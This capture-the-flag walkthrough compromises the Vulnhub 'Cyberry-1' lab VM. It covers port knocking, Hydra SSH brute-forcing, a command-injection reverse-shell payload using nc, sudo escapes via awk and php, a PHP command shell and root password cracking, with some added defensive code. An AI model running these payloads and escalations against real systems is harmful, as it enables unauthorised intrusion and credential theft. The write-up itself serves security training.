Vulnhub Cyberry – 1 Writeup

This is a walkthrough of the Vulnhub machine ‘Cyberry-1’, released on Dec 9th, 2017. Credits to Cyberry for releasing this challenging, nightmarish VM. I imported the virtual machine into VMware Player in Bridged mode. It is a Boot2Root machine: the attacker is challenged to gain root access.

Server IP: 192.168.1.104
Attacker IP: 192.168.1.101
Note: Edit hosts file to add “192.168.1.104 cyberry” (Not Mandatory)

Using Nmap to enumerate open ports and their respective services

root@kali:~# nmap -sV 192.168.1.104
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 05:53 IST
Nmap scan report for 192.168.1.104
Host is up (0.00012s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     ProFTPD 1.3.5b
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
666/tcp open  doom?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.60%I=7%D=1/18%Time=5A5FE913%P=x86_64-pc-linux-gnu%r(NUL
SF:L,BD,"Interesting\x20fact:\nThe\x20tiny\x20hairs\x20on\x20raspberries\x
SF:20and\x20blackberries\x20are\x20called\n\"styles\"\x20and\x20are\x20lef
SF:tover\x20from\x20the\x20berry\x20blossom\x20and\x20serve\nto\x20protect
SF:\x20the\x20berry\x20from\x20damage\.\nHave\x20a\x20a\x20great\x20day!\n
SF:")%r(RPCCheck,BD,"Interesting\x20fact:\nThe\x20tiny\x20hairs\x20on\x20r
SF:aspberries\x20and\x20blackberries\x20are\x20called\n\"styles\"\x20and\x
SF:20are\x20leftover\x20from\x20the\x20berry\x20blossom\x20and\x20serve\nt
SF:o\x20protect\x20the\x20berry\x20from\x20damage\.\nHave\x20a\x20a\x20gre
SF:at\x20day!\n");
MAC Address: 00:0C:29:5B:05:B8 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.15 seconds

The next steps were a full port scan, a check for FTP anonymous login and attempts at weak passwords on the FTP and SSH services. All of them came up empty.
Enumerating port 666 with Netcat

root@kali:~# nc 192.168.1.104 666
Interesting fact:
The tiny hairs on raspberries and blackberries are called
"styles" and are leftover from the berry blossom and serve
to protect the berry from damage.
Have a a great day!

I really did not understand what it meant.

Moving on to port 80.
Browsing http://192.168.1.104

Enumerating using Nikto

root@kali:~# nikto -h http://192.168.1.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.104
+ Target Hostname:    192.168.1.104
+ Target Port:        80
+ Start Time:         2018-01-18 06:05:49 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xa35 0x55eaceb7495d4 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
+ Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2018-01-18 06:06:00 (GMT5.5) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Browsing http://192.168.1.104/login.php

Using the “Sign up now” option, which leads to http://192.168.1.104/register.php, I registered with username “test” and password “test1234”. Logging in with the same credentials gives access to a panel, shown below

I didn’t find much to do over here!!

From http://192.168.1.104/login.php, I saw a link to main site http://192.168.1.104/berrypedia.html

Note: See Appendix 1 for another way to reach this page.

While browsing links and checking the source, I found placeho1der.jpg

Browsing http://192.168.1.104/placeho1der.jpg

Using an online photo editor, I rotated the image twice to the right and flipped it horizontally (options under the Basic menu) to get

The picture says “Port of Tacoma”. On further research I learned that the four people pictured are singers who each recorded the same song, ‘I Hear You Knocking’, in different years.
From top left, clockwise, the names and the release years of their versions: Smiley Lewis – 1955, Dave Edmunds – 1970, Fats Domino – 1961, Gale Storm – 1955. Based on the port and the song title, I concluded that this is a clue related to port knocking.

After a lot of strenuous effort and trial and error, I pinged the creators of the VM, @cyberrsec, for a hint. Based on the hint and further enumeration, I got the sequence: anti-clockwise on the ‘main’ placeho1der.jpg, starting from Dave Edmunds. The port-knocking sequence is 1970 1955 1955 1961.

Port knocking using Nmap

for port in 1970 1955 1955 1961; do nmap -p $port 192.168.1.104 --host-timeout 201 --max-retries 0; done

After running the above one-liner in a terminal, I started a full port scan with Nmap

root@kali:~# nmap -p- -sV 192.168.1.104
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 07:02 IST
Nmap scan report for 192.168.1.104
Host is up (0.000099s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE VERSION
21/tcp    open   ftp     ProFTPD 1.3.5b
22/tcp    open   ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp    open   http    Apache httpd 2.4.25 ((Debian))
666/tcp   closed doom
61955/tcp open   http    Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:5B:05:B8 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.53 seconds

A new port 61955 was found hosting a web service.

Browsing http://192.168.1.104:61955

While enumerating this website, similar to the one hosted on port 80, I found a link http://192.168.1.104:61955/H

Browsing http://192.168.1.104:61955/H

The page shows Brainf**k code. I ran it line by line in the online interpreter Execute BrainF**k and stored the output in a file ‘brainy.txt’, giving the following results.

root@kali:~# cat brainy.txt 
Hello World!
team members
chuck
halle
nick
terry
mary
kerry
pw:bakeoff

This looks like a list of usernames plus a password. Creating a username list ‘user.lst’ from brainy.txt.

root@kali:~# cat user.lst 
chuck
halle
nick
terry
mary
kerry

Using Hydra to find the right combination of credentials.

root@kali:~# hydra -L user.lst -p bakeoff ssh://192.168.1.104
......
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: mary   password: bakeoff
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 07:24:07

Trying username ‘mary’ and password ‘bakeoff’ for SSH access

root@kali:~# ssh mary@192.168.1.104
mary@192.168.1.104's password: bakeoff

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 18 01:57:39 2018 from 192.168.1.101
Connection to 192.168.1.104 closed.

The connection closes immediately. Appending a command to the SSH invocation, e.g. “ssh mary@192.168.1.104 id”, did not work either, so I concluded that no shell is defined for the user “mary”. Trying the same credentials against the FTP service gave access.

root@kali:~# ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD 1.3.5b Server (Debian) [192.168.1.104]
Name (192.168.1.104:root): mary
331 Password required for mary
Password:bakeoff
230 User mary logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .bash_history
-rwxrwxrwt   1 mary     mary          220 Nov 20 00:34 .bash_logout
-rwxrwxrwt   1 mary     mary         3515 Nov 20 00:34 .bashrc
-rwxrwxrwt   1 mary     mary          675 Nov 20 00:34 .profile
226 Transfer complete

A .bash_history that is a directory seemed suspicious. Changing into the .bash_history directory

ftp> cd .bash_history
250 CWD command successful
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
-rw-r--r--   1 mary     mary           64 Nov 29 22:35 .reminder.enc
-rw-r--r--   1 mary     mary          122 Nov 29 22:39 .trash
226 Transfer complete
ftp> get .reminder.enc
local: .reminder.enc remote: .reminder.enc
200 PORT command successful
150 Opening BINARY mode data connection for .reminder.enc (64 bytes)
226 Transfer complete
64 bytes received in 0.00 secs (240.3846 kB/s)
ftp> get .trash
local: .trash remote: .trash
200 PORT command successful
150 Opening BINARY mode data connection for .trash (122 bytes)
226 Transfer complete
122 bytes received in 0.00 secs (191.2370 kB/s)

I downloaded the two files .reminder.enc and .trash from .bash_history to the attacker system and investigated them

root@kali:~# file .reminder.enc 
.reminder.enc: openssl enc'd data with salted password
root@kali:~# cat .trash 
Most common passwords 2017 (Top 10)

123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

It seems .reminder.enc is a file encrypted with OpenSSL and .trash contains a list of passwords, so the file needs to be decrypted. For easier handling, .reminder.enc is copied to reminder.enc and a password.lst is created from .trash.

root@kali:~# mkdir openssl_decrypt
root@kali:~# cp .reminder.enc openssl_decrypt/reminder.enc
root@kali:~# tail -n +3 .trash > openssl_decrypt/password.lst
root@kali:~# cd openssl_decrypt/
root@kali:~/openssl_decrypt# cat password.lst 
123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

To decrypt the file I had to iterate through every cipher OpenSSL supports and, for each cipher, every password from ‘password.lst’. I used the following bash one-liner to do so.

for i in `openssl enc -ciphers | tail -n +2`;do for j in `cat password.lst`; do openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "decrypted$i$j" -k $j;done;done 2>/dev/null

openssl enc -ciphers lists the ciphers OpenSSL supports (tail -n +2 skips its heading line, and ${i:1} drops the leading dash from each cipher name).

Running that one-liner in a terminal creates a large number of files in the folder openssl_decrypt, as shown below

Now, checking for ASCII files

root@kali:~/openssl_decrypt# file * | grep ASCII
decrypted-aes256987654321:                    Non-ISO extended-ASCII text, with no line terminators
decrypted-aes-256-cbc987654321:               Non-ISO extended-ASCII text, with no line terminators
decrypted-camellia128111111:                  Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-cbc111111:             Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-ctrpassword:           Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-camellia-192-ecb987654321:          ASCII text
decrypted-camellia-256-ecb987654321:          Non-ISO extended-ASCII text
decrypted-des-cfb1234567890:                  Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-des-cfb1qwerty:                     Non-ISO extended-ASCII text, with CR, LF line terminators, with escape sequences, with overstriking
decrypted-des-ecb1234567890:                  Non-ISO extended-ASCII text, with no line terminators, with escape sequences
decrypted-desx12345678:                       Non-ISO extended-ASCII text, with NEL line terminators
decrypted-desx-cbc12345678:                   Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64-cbcpassword:                 Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64password:                     Non-ISO extended-ASCII text, with NEL line terminators
password.lst:                                 ASCII text

Reading the decrypted file,

root@kali:~/openssl_decrypt# cat decrypted-camellia-192-ecb987654321 
In case I forget, my login is dangleberry69

A new password, ‘dangleberry69’, is found.
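As an added example (not part of the original writeup), the following Python reproduces the two pieces of knowledge the decryption loop above relies on: how `openssl enc` turns the password and the salt stored in the file's `Salted__` header into a key (EVP_BytesToKey with MD5, which is what `-md md5` selects and what `file` means by "salted password"), and a stricter version of the `file * | grep ASCII` triage that rejects the 'extended-ASCII' and 'escape sequences' false positives seen above. The cipher step itself is left to openssl; the function names, the salt and the sample output blobs below are constructed, not the real reminder.enc.

```python
import hashlib
import string

OPENSSL_MAGIC = b"Salted__"                      # 8-byte magic written by `openssl enc -salt`
PRINTABLE = frozenset(bytes(string.printable, "ascii"))  # letters, digits, punctuation, whitespace


def parse_salted_header(blob):
    """Split an `openssl enc` file into (salt, ciphertext); None if it is not salted.
    This header is what `file` reports as "openssl enc'd data with salted password"."""
    if len(blob) < 16 or blob[:8] != OPENSSL_MAGIC:
        return None
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, md="md5"):
    """OpenSSL's EVP_BytesToKey with count=1: D_1 = H(pw||salt), D_i = H(D_{i-1}||pw||salt),
    concatenated until key_len + iv_len bytes are available. `-md md5` selects H = MD5;
    newer OpenSSL releases default to SHA-256, which is why the flag matters for old files."""
    derived, block = b"", b""
    while len(derived) < key_len + iv_len:
        block = hashlib.new(md, block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


def looks_like_text(data, min_len=8):
    """Strict triage: every byte must be printable ASCII or ordinary whitespace.
    A wrong key or cipher yields high bytes, NULs and ESC characters, which `file`
    still labels 'extended-ASCII text'; this rejects them outright."""
    return len(data) >= min_len and all(b in PRINTABLE for b in data)


def triage(candidates):
    """candidates: {file name: bytes}. Returns the names worth opening, in input order."""
    return [name for name, blob in candidates.items() if looks_like_text(blob)]


# Constructed stand-ins for the decrypted-* files (only the first mirrors the real plaintext).
SAMPLE_OUTPUTS = {
    "decrypted-camellia-192-ecb987654321": b"In case I forget, my login is dangleberry69",
    "decrypted-aes-256-cbc987654321": b"\x8f\xa2In c\x00se\xff\xe9 forget\x93",
    "decrypted-des-cfb1qwerty": b"\x1b[31mjunk\r\n\x07garbage\x1b(B",
    "decrypted-rc2-64password": b"short",
}

if __name__ == "__main__":
    salt = bytes.fromhex("0102030405060708")                 # constructed salt, not the file's
    key, iv = evp_bytes_to_key(b"987654321", salt, 24, 0)    # camellia-192-ecb: 24-byte key, no IV
    print("key:", key.hex(), "iv:", iv.hex())
    print("worth reading:", triage(SAMPLE_OUTPUTS))
```

The key/IV split is the only thing that changes between ciphers: a 128-bit CBC mode asks for 16 + 16 bytes from the same derived stream, a 192-bit ECB mode for 24 + 0, so one derivation routine serves the whole loop.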

While enumerating http://192.168.1.104:61955, I found another login page similar to the one hosted on port 80, but this one didn't allow registrations. It also reports a wrong username explicitly when testing the login.

Testing username ‘mary’ and password ‘bakeoff’ shows

Here the password was wrong, but since no error was reported for the user, ‘mary’ is a registered user. Trying username ‘mary’ with the password ‘dangleberry69’ retrieved from the decrypted file, we gain access.

Visiting the section ub3r-s3cur3 at http://192.168.1.104:61955/ub3r-s3cur3/index.php, I see the output of an nslookup command based on the submitted query.

This is a classic command injection scenario, which can be exploited here to gain a low-privileged shell.

Set up a Netcat listener on the attacker system on port 443

root@kali:~# nc -nlvp 443
listening on [any] 443 ...

Using “Inspect Element”, I edited the value of an option in the drop-down box to append a command that calls back a reverse shell to the attacker system, setting the option value to

google.com; nc 192.168.1.101 443 -e /bin/bash

Submitting the query gives a reverse shell with the privileges of user ‘www-data’.

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 38607
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
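As an added example that is not part of the original writeup or the VM's code, here is the pattern behind the ub3r-s3cur3 page in Python with the hardened form beside it: the vulnerable builder concatenates the query into a shell command string, while the hardened version allow-lists a host name and hands it to nslookup as a single argv element with no shell involved. The function names and the regular expression are my own.

```python
import re
import subprocess

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens, 1-63 chars each,
# never starting or ending with a hyphen. Nothing else (';', '|', spaces, '$(' ...) can pass.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def build_lookup_command_vulnerable(query):
    """The pattern behind the ub3r-s3cur3 page: the query is pasted into a shell string,
    so a ';' in it starts a second command. Shown for contrast only; never run this form."""
    return "nslookup " + query


def is_valid_hostname(query):
    """Allow-list check: a syntactically valid host name and nothing more."""
    return 0 < len(query) <= 253 and _HOSTNAME_RE.fullmatch(query) is not None


def build_lookup_argv(query):
    """Hardened form: validate, then pass the value as one argv element.
    With no shell in the path there is nothing for metacharacters to act on, and the
    no-leading-hyphen rule also stops option injection ('-v', '--anything')."""
    if not is_valid_hostname(query):
        raise ValueError("rejected lookup target: %r" % (query,))
    return ["nslookup", query]


def run_lookup(query, timeout=5.0):
    """Run the lookup with shell=False (the default for an argv list) and a timeout."""
    result = subprocess.run(build_lookup_argv(query), capture_output=True,
                            text=True, timeout=timeout)
    return result.stdout


# The payload used above, kept only to show the difference between the two builders.
INJECTED = "google.com; nc 192.168.1.101 443 -e /bin/bash"

if __name__ == "__main__":
    print("vulnerable builds:", build_lookup_command_vulnerable(INJECTED))
    for q in ("google.com", "cyberry", INJECTED, "-v", "bad..name"):
        try:
            print("hardened builds:", build_lookup_argv(q))
        except ValueError as exc:
            print("hardened rejects:", exc)
```

Escaping the input for the shell (escapeshellarg in PHP, shlex.quote in Python) is the weaker fix: it keeps the shell in the path and does nothing about option injection, whereas validating against an allow-list and using argv removes both problems at once.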

Further enumeration revealed another password list

www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ ls -al     
ls -al
total 20
drwxr-xr-x 3 www-data www-data 4096 Nov 30 01:37 .
drwxr-xr-x 9 www-data www-data 4096 Dec  8 22:49 ..
-rw-r--r-- 1 www-data www-data  312 Nov 29 23:30 index.php
-rw-r--r-- 1 www-data www-data  644 Nov 25 11:45 nb-latin
drwxrwxrwx 2 www-data www-data 4096 Dec  8 14:57 teamdocs
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ head -n 10 nb-latin
head -n 10 nb-latin
porto
portavi
amo
amavi
paro
paravi
video
vidi
mitto
misi
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$

Copying nb-latin to use as password.lst, together with the previously created user.lst, a new set of credentials is found using Hydra

root@kali:~# hydra -L user.lst -P password.lst ssh://192.168.1.104
.....
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: nick   password: custodio
[STATUS] 371.00 tries/min, 371 tries in 00:01h, 233 to do in 00:01h, 16 active

Gaining SSH access as user nick with password custodio

root@kali:~# ssh nick@192.168.1.104
nick@192.168.1.104's password:custodio 
Last login: Wed Jan 17 21:39:14 2018 from 192.168.1.106
nick@cyberry:~$ id
uid=1003(nick) gid=1004(nick) groups=1004(nick)

Now enumerating the commands permitted under sudo shows

nick@cyberry:~$ sudo -l
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh

Checking invoke.sh as user terry

nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh
readlink: missing operand
Try 'readlink --help' for more information.
/home/nick/invoke.sh: 24: shift: can't shift that many
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh -h
usage: invoke.sh -e KEY=VALUE prog [args...]
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /usr/bin/id
uid=1004(terry) gid=1005(terry) groups=1005(terry)

Shifting from user nick to user terry

nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /bin/bash -i
terry@cyberry:/home/nick$ id
uid=1004(terry) gid=1005(terry) groups=1005(terry)

Note: Refer Appendix 2 for another possibility

Checking again sudo permitted commands for user terry

terry@cyberry:/home/nick$ sudo -l
Matching Defaults entries for terry on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

Shifting from user terry to user halle

terry@cyberry:/home/nick$ sudo -u halle awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1001(halle) gid=1001(halle) groups=1001(halle)

Checking again sudo permitted commands for user halle:

$ sudo -l
Matching Defaults entries for halle on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php
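The three sudo -l listings above share one weakness: each hands an interpreter, or a script under the caller's own home directory, to another account with NOPASSWD and SETENV. As an added example (not part of the original writeup), the following Python parses that output format and flags such rules; the SHELL_CAPABLE list and the rule categories are my own choice and illustrative rather than exhaustive, and the sample text is pasted from the listings on this page.

```python
import re
from collections import namedtuple

Entry = namedtuple("Entry", "user runas tags command")

# Illustrative list of binaries that can hand back an interactive shell or run arbitrary
# code by design (awk and php are the two this box chains through). Extend for your estate.
SHELL_CAPABLE = {"awk", "gawk", "mawk", "php", "perl", "python", "python3", "ruby",
                 "sh", "bash", "dash", "vi", "vim", "less", "more", "find", "env"}

_USER_RE = re.compile(r"^User (\S+) may run the following commands on")
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Turn `sudo -l` output into Entry records (only the 'may run' block is parsed)."""
    user, entries = None, []
    for line in text.splitlines():
        m = _USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        m = _RULE_RE.match(line)
        if m and user:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            entries.append(Entry(user, m.group("runas").strip(), tags, m.group("cmd").strip()))
    return entries


def audit(entries):
    """Return (user, runas, command, reasons) for every rule that grants more than it says."""
    findings = []
    for e in entries:
        reasons = []
        binary = e.command.split()[0].rsplit("/", 1)[-1]
        if e.command == "ALL" or binary in SHELL_CAPABLE:
            reasons.append("%s can spawn a shell: effectively full access as %s" % (binary, e.runas))
        if e.command.startswith("/home/%s/" % e.user):
            reasons.append("target lives in the calling user's own home directory, "
                           "so they normally control its contents")
        if "SETENV" in e.tags:
            reasons.append("SETENV lets the caller set the target's environment")
        if "NOPASSWD" in e.tags:
            reasons.append("NOPASSWD removes the password prompt")
        if reasons:
            findings.append((e.user, e.runas, e.command, reasons))
    return findings


# The three listings from this box, as they appeared in the writeup.
SAMPLE = r"""
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php
"""

if __name__ == "__main__":
    for user, runas, command, reasons in audit(parse_sudo_l(SAMPLE)):
        print("%s -> %s via %s" % (user, runas, command))
        for r in reasons:
            print("    -", r)
```

Running the same check against the real sudoers (or periodically against `sudo -l` output collected from hosts) turns the chain used above into a finding before anyone walks it; the remediation is to grant a specific, non-interpreting command under a path the caller cannot write to.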

Shifting from user halle to user chuck

$ sudo -u chuck php -r 'system("/bin/bash -i");'
chuck@cyberry:/home/nick$ 

But when I issue any command in the new shell, an “Intrusion Detection System” kicks in

chuck@cyberry:/home/nick$ id
Cyberry Intrusion Detection activated
System Failsafe Mode :SFM: will begin in:

So, back in the halle shell, I create a small input-based PHP shell so that I can enumerate the system as user chuck

chuck@cyberry:/home/nick$ exit
$ echo \<\?php system\(\$argv\[1\]\)\; \?\> > /tmp/shell.php    
$ php /tmp/shell.php id
uid=1001(halle) gid=1001(halle) groups=1001(halle)
$ sudo -u chuck php /tmp/shell.php id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Now while browsing the home directory, I came across

$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck"
total 40
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 .
drwxr-xr-x 9 root  root  4096 Nov 29 23:58 ..
-rw------- 1 chuck chuck 6175 Jan 18 03:56 .bash_history
-rw-r--r-- 1 chuck chuck  220 Nov 19 13:18 .bash_logout
-rw-r--r-- 1 root  root  9182 Nov 30 22:14 .bashrc
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .deleted
-rw-r--r-- 1 chuck chuck  675 Nov 19 13:18 .profile
$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck/.deleted/"
total 16
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 ..
-rw------- 1 chuck chuck 1965 Dec  7 16:47 deleted
drwx------ 2 chuck chuck 4096 Nov 30 23:27 ssh_stuff

Reading the contents of the deleted file under the .deleted directory

$ sudo -u chuck php /tmp/shell.php "head -n 40 /home/chuck/.deleted/deleted"
From:		Berry, Chuck (chuckberry@cyberry)
Sent: 		Wednesday, November 22, 2017 2:52pm
To:		Nick, Chuck (nickberry@cyberry)
Subject:	Re: Christmas Meal
Thanks Nick, that might just help me out!
He did give me a few minor clues...
The password starts with "che" and ends with "rry"
letter e is used three times
letter c is used twice
letter r is used twice
letter b is used twice
letter a is used twice
The only other letters in the password were h,w,m & y
I think I'll probably have to write a little script to bruteforce SSH
with what I already know. If I get it done before close of business 
I'll get onto sorting out the Christmas meal. Promise!
Thanks again
-------------------------------------------------------------------
Ah ok buddy. I don't know if it helps you in any way
but I saw the password jotted down on a post-it note in his office
the other day! I can't recall it exactly but I do remember it being
a concatenated 4-word password....You know like "eatberriesandsmile"
It wasn't that, but it was something like that.... in fact I'm pretty
sure one of those four words was actually latin... Now that I'm thinking
about it I'm pretty sure it was "baca".... well 99% sure. 
I've been studying latin for a few months now, so it kinda 
stuck in the memory
Please don't tell anyone I told you this b.t.w! :-)

The mail discusses the root password. Based on the clues, I followed this methodology to create a wordlist.
1) Since the clues mention 4 concatenated words, I chose words from the American English wordlist at /usr/share/dict/american-english.
2) The first word starts with ‘che’, the last (4th) word ends with ‘rry’, the 2nd or 3rd word is ‘baca’ and the remaining 2nd or 3rd word is an English word.
3) Based on the given occurrences, letter ‘a’ can be eliminated from the other words, as it already appears twice in ‘baca’.

First I extract the words from the American English wordlist that start with che and store them in che.txt.
Then I filter che.txt to remove words containing letters not allowed by the clues. Here I also eliminated ‘r’, since it already appears twice in ‘rry’.

root@kali:~# mkdir pass
root@kali:~# cd pass
root@kali:~/pass# grep ^che /usr/share/dict/american-english > che.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q r s t u v x z; do grep -v $char che.txt > temp.txt; mv temp.txt che.txt;done

Next, I extract the words that end with rry and store them in rry.txt, then filter rry.txt the same way to remove words containing letters not allowed by the clues

root@kali:~/pass# grep rry$ /usr/share/dict/american-english > rry.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char rry.txt > temp.txt; mv temp.txt rry.txt;done

Last, generate a third list, dict.txt, containing only the words built from letters allowed by the clues.

root@kali:~/pass# cp /usr/share/dict/american-english dict.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char dict.txt > temp.txt; mv temp.txt dict.txt;done

Finally, I wrote a Python script that iterates through the three files and inserts ‘baca’ as the 2nd or 3rd word of the 4-word concatenation, which is then checked against the given letter counts. If the check passes, the candidate is written to a file, producing a rule-based wordlist. Note that some uppercase words which do not fit the clues also end up in the wordlist. The script was written hastily, and anyone is welcome to write a better version.

# wordlist_gen.py: combine che.txt, dict.txt and rry.txt around 'baca' into
# 4-word candidates and keep those matching the letter counts from the e-mail.
def check_occurence(word):
    # letter counts given in the clues: e x3, c x2, r x2, b x2, a x2
    e_count = word.count('e')
    c_count = word.count('c')
    r_count = word.count('r')
    b_count = word.count('b')
    a_count = word.count('a')
    return e_count == 3 and c_count == 2 and r_count == 2 and b_count == 2 and a_count == 2


# one word per line; strip the trailing newline (and any stray whitespace) from each entry
first_words = [w.strip() for w in open('che.txt', 'r') if w.strip()]
end_words = [w.strip() for w in open('rry.txt', 'r') if w.strip()]
mid_words = [w.strip() for w in open('dict.txt', 'r') if w.strip()]

flag = 'baca'  # the latin word, placed as either the 2nd or the 3rd word

with open('final_list', 'a') as final_list:
    for first_word in first_words:
        for mid_word in mid_words:
            for end_word in end_words:
                test_word1 = first_word + flag + mid_word + end_word
                test_word2 = first_word + mid_word + flag + end_word
                # both orderings contain the same letters, so one count check covers both
                if check_occurence(test_word1):
                    final_list.write(test_word1 + "\n")
                    final_list.write(test_word2 + "\n")

Executing it creates the wordlist final_list

root@kali:~/pass# python wordlist_gen.py 
root@kali:~/pass# ls
che.txt  dict.txt  final_list  rry.txt  wordlist_gen.py

Finding the correct credentials with Hydra to gain root access

root@kali:~/pass# hydra -l root -P final_list ssh://192.168.1.104
[22][ssh] host: 192.168.1.104   login: root   password: chewbacabemerry
1 of 1 target successfully completed, 1 valid password found
